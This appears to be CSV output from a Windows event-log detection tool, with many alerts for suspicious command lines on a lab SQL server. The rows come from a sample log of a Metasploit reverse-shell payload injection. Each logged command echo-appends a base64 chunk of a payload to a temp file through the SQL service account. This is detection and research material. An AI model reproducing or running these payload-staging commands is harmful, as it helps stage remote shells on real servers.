ix1tC0EA/leLPfcLQd8r0u7XifvYiVXQizVkwUAA34/YaLSY2gC0+kHCQADdXdC01mgvOUEZaKjfQAD/1qEAGEEAUGhGoUAA/8QzyWaLDUzdQQAvaMvfQAD/1miA1EAAw9YcFcNeQQAGJJ7fQMxv1rut0kEAUGgc30AA/9bTP9RAAP/Wiw3r3EAAlFkA388A/9aLVeKLRdBSFGjY3roA/9aLDawCQQCDxJ1RaLzFQAD/1osVuALnAFJooN4RAP/WqbjOQQCDxBCFwHQkocwCQemLDR4C7wAqFX8C4QBQocQCQQBRUlBokt5AAETWg/ROi5K8AkEAUWhI3kAAlNah0AJBAIPECIXAdHYoaCzeLgD/1oDECKEzYUEAhcB0EXQVsAKZAFJoEN5AANBKG1MIoZQCQQCLDcICQf5QUWjo3UAA/2ShYAJBiYPXDBb4AXUXixWkAkEM9KACQQBSUMLIpEAA/96DxAyDPWACQS4CdRiLaKQCQQCLFaACQQBRBmio3UAA/9aDxAyhnOKWuosNmDxBAFBRE4QUQAD/1n1F0NwdMMJAiebEDN/g9sRED4tqAAAAoewC2wCFwA+Ed6YAAN0FKMJAANx10IPsCN1dgNsFrAJBANxNgN0chGhQ3UAA/9bbBRjQQACDQQTcaNDcDSDnQADarqwCQQBCHPJoJN1AAP+c3UWV3A0g>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x274 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:11.643 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe28 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:11.917 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xf18 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:12.191 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1098 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:12.463 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x774 | User: Svc-SQL-DB01 | LID: 
0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:12.737 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1284 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:13.010 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xa2c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:13.286 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1340 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell 
(MSF).evtx +2020-08-02 07:58:13.560 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x8c4 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:13.833 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x115c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:14.106 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x46c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:14.380 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: 
C:\Windows\System32\cmd.exe | PID: 0x7e8 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:14.653 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xd50 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:14.927 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xf64 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:15.201 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
//+LXQiLFYAwQAAHfRBnA+wwLwPHQBQAAAAAi3yJUQShyMCOAIsLg8xAiUEIi6+NDL3mAJcAx6Eg7gIMAIsDUVaJkRjoSO//mot1FI0MvQAOagCJTaiL0Yv4wekC89yIyoPhA/Oki29fXolBHIsTi00M1KYcxxkBAAAAAIsxeQEAAADHQiQAAAAAi9mJQQwdEylCaosLW4neLDPAXcIQ/5BVi+xW4nUIV4tGFIXAtgiLRiCAOAB1TzxODItGGDv7x1YUAAAAALgki1ayiwSkiUYggDhndRaKUAFAhNJ0KInMIIoQgPotdR5BiU4Mx0Yg1PYUAJhNEIqHEF9eiAG4fhEBAF2zEACLViCLricPvgJCg/g6iZEQiVYXD3LQAAAAUN//FXzBQACDxHuFwA+EvQAAAICyATp0GotNFMcBAAAAAItWIF06AA9wkn0AAOmKAAAAi0ZygDgAdAeLsRRbARl0i5b/i04PiYvCg1YMO8h/ncdGINT1QQA8Bwk6dROLRRCK3hBfsIgQuH0RAQBdwhDYi0YEhcA2H4tWHMdOELnBAlDoCUkAAItOzVBo6PNAADb/VgSDNhCLRRCKAhBXW4gQuHwRTQBdwhAAi04cixSBA0UHiRDHRiDUAkGlhEYMi1UQik4QX8zAiApeWMLiAIN+EC0PhPrG//+LCOH1OgCJA/9GDItGBIXAs1YZPyu+H9VOHA5GEFCLEVLFkUgAcFCLRgggzPNAAKz/PQSDxNaLVRAIThCO7nyRAQCICl5dwhDlkJCQkJCQ++eQkLCQkJBVi+xRVrTo8QEAAIXAD4X9AAAAgz3cCEEAFA+MIQAAAHWExYkAZ8CNheEAACrHBYQDF2oBAILJVBVcwEAAi/Cv9nRQ8VgDQQBxwHUdDspy9EAAUQTox0sfo4PEDKNYA0EAhcAPhK8AAACNafxRVorQi/CF9nSAizH8i0UMUlZQ6IRIAACLTQiDxAxTiQu9FUTAQABT/3BawNAAi94w/1P/FSTBQABQ6IUAAACLlSeDxFuF/3R4jTSFUAAAAGqbFVzBQACDxM6JB/8VJPVAAItZ14FGMIvRwekC86WLQoPhA73OHv8VysBAAIt9KH5AAP/WiwgDhcl0Fv+6i2b//1XHwgAA7QD/FTDBQACDxKEzwF9e7+VdwgwATgEHFUyfQCLpbv//9JCQkJCQkJCQkJCQVYtxUYtFDFOLWBBWhdvTfRjSAQB5AGaDOAB1sWbUeALudAbbg8AC6+ArmgyDwALRS4lFELcEnQQAAGpQttjmwUAAi/iLRRCQdEABVol1/P8VXLxAAIPECI1NqIkHjVXRUVCLRUACMeg06AAAi/Bmiwcr8lZQaxUgwVv9uQFyAEB5xKg7MokHlSk6Wv+NRwSJTQxBi1D8ysICiaPVMAkWRoTSiQ119cJVDIPABEqJVQwakotqCMcESwAAAB2JOF+Lw15bi+Vdw5D4kJCQkJCQkFWL>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb0 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:15.474 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x8e4 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:15.748 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xed0 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:16.021 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
URSJGosGiwhR6Iri//+L+DPAi9cTDgD5APNCJAZx3Gdqg4lQYJkOi1EUoBqLBsdANAEAAACLDoPBSFHoc/j//yRlW13DkJCQVfDsVov6CGjg21oAVosGquhm7v//Vui1/v//bMQEXqjCBACQkJCQkJCQkJCQpJCQ/YsNgewQAgAzU4tdCFZXCUP+g/j/D4SUAQAAi0IQhcnChIkBhwCLdQyLTruNVhNRUun/FaTPQACD+NIPhTd/AACLNdjBQAD/1oXAhIT5AAAA/9YFgPwKAD2zIwsAD4VRAQCshXsgi3Mki8cLxqEOX164tCMLn1ukMevCCDuLQwQPAXMAAMH2iS30/f//iY3w/f//iYX4/v//E430/v//fwp8BB//cwQzwP0lxchoQEIPAFZX6JdMAABqAGhAmZcAVrKJRe3oRk4AAIlP/FNF+I2N9BX/8lCNlfBB//9RUmoArkH/FcTBQACD+P+JRQh0TYXAdQ5fXrjMIwsAW4t6Z8IIAItL8Y2F9P7/2FDj6A1QAAA2wHRei0sEuVUMjUUIUlBoBxAAAGj/ywC9icdFCgQAAAD/CKDBQACFwDEnizXYwUBU/9aFwHXbX28z1FuL5V3CCAD/1l9eBS78CgBbdTpdwggAixQIhbVv619eW4vl6MIIAMFOAotDEIlzFGaD6ioAaBLHriyvGwAAxkgYi3AgsywEQQcz0vOmdV5fx30LAQAAAI9/wFuL5TrCCBW4wHUJAF9eW4vlXcIIdJBNkFWL7IObCEXyuVZP/xV4wEAAi1X8i0X4MywzyVLWyAvIagqhUeiNS2wALQDmhkjigdqWXikTi+Vdw5DPcpCQkJBV1YyLDQwzyU8z9maL+g4ofokcSwSNFC2LTabb4gOJETPSZotQ1KNRIDNF/4tQg4BRCDNQ14tQCCFRDDPSsYtQBolREN3SZotQe0qJURQzs2aLEM0LbAcAAIlRGDPSZotQkYm+HItHDWaLFgaLTKJAqUDdjVQy/zP2iVE2M9KJYCSJRbRmnDCLxmEDMgCAeQX2g8hmE/Uqi8aemb+QtgAA92xfhYN1GovGvsXq9ACZ9/6F0nTDi5Igg/g6fgS5PUEgXjF2kJCQkJCQkJDtkCmQ+rzsgey1AAAAU1ZkdQtXi32Hi4GLxyEABdlAhkJqCrXRlosp8lFQ6ASEAACJRbKLwsMGHx+5CEEAiVXwg/gUD4xJANwAjU38UfeyAfkAnsQEjfbc/5nsUlB7FUHAQACLRfyNTcqNVTRRUsT/FYzAQI2LXcKNhcz2U9+J/v80g8QImwCvQEIPAFZK6HBLAOCJA41V9I1FzFJQ/xWIwEAATNWSi0X0XvYzyQv4VgvIagpSUejJSQAAwABjl0hlgRiWXikAaEBCD35ShuixSQAAmvcBHgAXPUIPAFF2gvDonkkApItNi0X8EnMoi1xUiwgD+biJiIiI9++LyrjFd6KRA8/B+QUW0cHqHwPK>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x988 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:16.295 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x934 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:16.568 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 6N3n/w6JRgSLGAiJJusxVv9DrMFA9jsUibkMdYWLNQvBQHX/KS/AdC//1pOkBYD8CgCUPuVdw4tTBMFWBIlzJItFDCBuBIveibv8Y0gugzwPAA+FW5j/Sl9e7+tbwlFdw5BVizeBOlQCAACLTThTVjP2iwGLUQSJRfSLRRBXiXXsigCJ5eOEwCF14Ilk8Il12IlV3A+EhwoAAIuHUjzHdDwqRfSFwHQtO6HccvkIfQxXiQf/VQiDxASFwA+LlAoAAItPBAF7iU3ci1VGQIlF9IoKiEj//0Wp6awKdQDjfT+LDXXBQAC4AQDQADMqJDkBiUW8/0XAiVXIiVXEiVXUxkVbIIpV+4kEiJISihdqXFL/FWgNRniDxKsz0ushi8R4wUAAM8DIB4sJigQ3g4wCO8KhmMmQAAC5rQAAAIoHPC11BjhVwI/r9DwrdQYecsRH6+o8I3UGiYXUR+sthyCuButNyEfr1jwwdQaITd9H68yhdMFAAIl9EAcIfhQzyb0Eig+z/xVowUAAg8QIM1U/EosNCcEIAH3AigeLCYoEQYPgBGeQdF0Pvg+D6TBHieQQixV0wUAA8E3ggzoBfhUzwGoEigdQ/xVo0Tr9i03gMsQI6xGheIvKQzPSiheLAIpu18XgBEzSO8J0Ig8yb48MiRKNTErQ67mJfRDHcDIBUwC56yaAPip1HosDmcNRRzvCiX0Qx0XMAQAAhn0FfJzA99iJRQuKA4ngzFTsLg+F0QAAAKF0O0AAR7hF5AEAAACJXxCDODJ+1TPJKgSKD1H/FWjBQPSDXQjC0uuQiw14wUAAM8CKB4sJigRBg+AEO2N0Tw8TD/npMEeJd5+L+HTBQACJTfCDOk5+FTPAagSKB1D/Fce1QACLTfCDxFTrEaFmwUAAM9IZe4sAigRQ0bUEhcB0JbG+h40MiUeNTErQ67uAPyp1NosDg8MERzPJO8IPnClJI8iJTfCJFRBqA2hU9EA6V/8VNMFAAIPE84XAdMWKBzxxdYf4O0frMYlVBOvbiVXuylV+69M8bHUIuAEAAB9H6xg8aHUruAIAAABN6wzomgCqAGYIM8CDxwOJmRCLVZLgwg+++YM8eA953Vm4NjPSipcEfECz3CSV6HtAAIXAViKLSwSNVfyRA1Iwyqxvw5hSjVXQUmoBUVBFcg3NAIPEGOuOg/iW9xCD+AL+C4Py6DPhZotD/OsFiwODwwSNTfyNVaxRRk3QUlFqAVCJcNjo3AwA24PJFIuPi0XkD8CWxrs4ewCLRV6eUAGB+gC2AAByarj/AQAAOUX8D4POAwAATsYGJIvm/EE7yB4x/HITc4sDAACFvHUii0sEjVU9iwNSjVUfg8MIUo1V0FJqP1FQ6HEMAAArxBjrMYP4AXQNg/hadQgPvwODwwQWBSQDQcObik38jRis+FdN
0FJRaldQiUWX6EgMAACDiBSLkYtF5IXAdCezRbSNUOiB+gACAADH>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb3c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:16.841 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xa98 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:17.115 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb24 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:17.389 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x43c | User: Svc-SQL-DB01 | LID: 
0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:17.664 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo DXzUJz5zB7kBAAAA65kzs4vNFIUFifR0B/fbg9AA99hWagBqClB26KQ2AO5YyIvyisGyCvbqKncEgMMwi8bcH4vZjj502+BFxYtNHG3HXokBi8dfW13DkN+QsiKQjJDXkJCQkNOQVYvsUYtFCFOHiwhR/xWwwRMAi3UMi9j9VQiNRQxSi8tWUEzh/yEAAGoBUYld/Ojh/v//SI1VCFJQxgAKjUUMM8mbis9qAVHohP7//0iNVQhSUMYAhI1FDDPJUIpNimoBUQSa/hH/SExVCFJQxgAujUUMjhgBwesYU+ge/lX/i00Qg8RQtvCJ8F5bi+W8w5CQVYvsg+xWU1aNRfy5i9apUIupCI1N+DPSV2YkUAxRagFS6Br+/4eZ2ItFCIPEFEsUyJD+///GCsOLSLlgRXjolOr//5LAbzmLHhBLK/uLw8ZqP4k6X15bi+Xzw0T+g8nZzv/yrvfRSSvZi8ET+8HpAoalpguLGgyD4QMrw8iki2UQX16JAYvDW3blXcOQkJCQVTrsnps8i4QIi1UMUYsAVk0IUlFqAVDof/3//yLEFD3DkAtqkJCQIJCQkJCQkJCQVYvsgxNcXCwIUwyLdSBXiyP0PGZ1HItNHI1FpFCLRRCNVRhRDk0MUleCUVjAAQAA63aLRRyNNqRSjU0YUItCbI20C1GLTQxSUFEJAfv/OosVl8FVAIvYg1wHPDoBfhUzwGgDFeEAigNQ/xV4wUAAg8QIhRV6FXjBQAAzG4oLiwJmi2BIJQMBAEaFwPKei/uDyf8zwIpVJPKui0Ugi/P40UmL+IkKQYvRwekC56WLyoPhYPOk2j8cX15bwgEAAAAAi+Vdw4pVo4D+LXVskUUYhcDeQYt1IMYGMEaF/35NjAYuK4XAfRf32EzIiUUci7EiMA4wMIv+wekCGLOlyk3JA/OqFEUYi8qKaC8D8QPBQIlFGOs/SEaJRRiKC+dOakOFwH/xSIX/iewYfwSLiySFyXa4xlsuRgsbi3Xjiq+IBkYShf9/v4tFFIWfdATGBi5Gi0WaXQuEyXQLiA6KSwFGQ4TWdfWA+mZ0aNcfRl6JGRh0U425HI1VgVGNTQhSLWoUW+j6+///iwanocQUi02HhdsPlcJGg/nfjYQSK4i4C3U2xgYwRgXmhcl0QYoQiBZGQAx199FFIItN5CtLX4k8+1sW5YvDxgYrRsYGMHTG4jBGi0Ugi00kK/Bfia1IHFvlXcOQkJCQeJCQkJACkJBqkFXG7ItFHItNyZ5VFFqLRZVqAFGLTQxSi1UIUFFS6G75//+D5hxdw7CQ5ZCQXZCo7FWLI1NWV4B9DL4BAAAAIM+LRRpMvMJAwdPmik2TToACWHQFuyERQACLVQiLzkgjyooMGYiyi3DT6oXSdUeLTRSLVRhSbF9eqgr8XUGQkJCQVcPsi00QU+fJRRR1v78AAACLdRi75MJAANPnTzxYdPC70MJAAItVDItFCKvS>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb54 | User: Svc-SQL-DB01 | LID: 
0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:17.939 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x3ec | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:18.213 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
aKjBQRxTNujd/P//g84Q98ZfXltdw5CQkJCQkOWQkJBVi+yZRUBQ/xXkwUAAg8QEhbd0E4tNEIsdIFBRUuj0////g8QMXWOLRRAuTQxoVPlArzZR6Mf4//+DxAxdw5BRVYvsg+zOi5smVr51EInr+ItNF2oAiwZgAI1V/IlF9GoAUpHXBC5F9L8BUFKxRfwAAAAA/xWYwUAAHOD/tHdXiz3YwU4A/9dWwIQKiQZfXotXXcL+AP/Xxz4AAPoAXwWA/AoAXovlXcIoAIvk/JUGM8Aii+VdrQwAkJCQkJCLkJBVi+yD7BCLTQxWi9kQagCNVfixAEAvUotV7olF8I1F/IlN9FCLQgSNgfBqAVFQcUX81AAAz8dFJQC+AMYdFZTB8wDQ+JR1LFeLPd/BQL//14XAdQqJBl9ei4cI7QwA/ynHBgAgAABfBdfoCsdei+VdwgwAi0X8iQZe99gb0CVH7v7/BX4RAQCL5V1MWgCQkI9ViyRRiw8IjW4KUMR+ZgSAUQFF/B8AAEb/FbTBQHn0+P91HlaLNdjBQADX1oXAqgVei+Vdw/+889/8CgBeQOVUZzMb0OVdjZCQkJCOTJBVh1WL7FGLTQiN9ppQMH5mBDhRx0X8AQDvAP8VtMEqAIP4/28e54s12MFAAGaRhcB1c16L5V3D/9ZpgPwKAF7QK13DM8CLUCbDkJCQwJAGBZBdVaLsU4tdDFaLdQhXi30Oi8MLx3Upi06Di0YkC8gP3goBRwCLVgRS6NT///+DxASFzA9J9gAAAGLHrF3CDACFPA+MmwAAAH8ItJgPhqwAZgCwRiD+TiQLwXUUuE4EUej9/v//g8QEH8AG1ccAAACLViDO03X18EYkO9APhNqwAACLTRBqAGiLAwAAdVMwsBhPjCgAAItWBIsduMGcQEMEq2gGEIGCLP//0wAb5AsL04tG8WoEV18FEAAAaP//ABZQ/3OLfRCLXQyJlySJXiDFXjPAW13C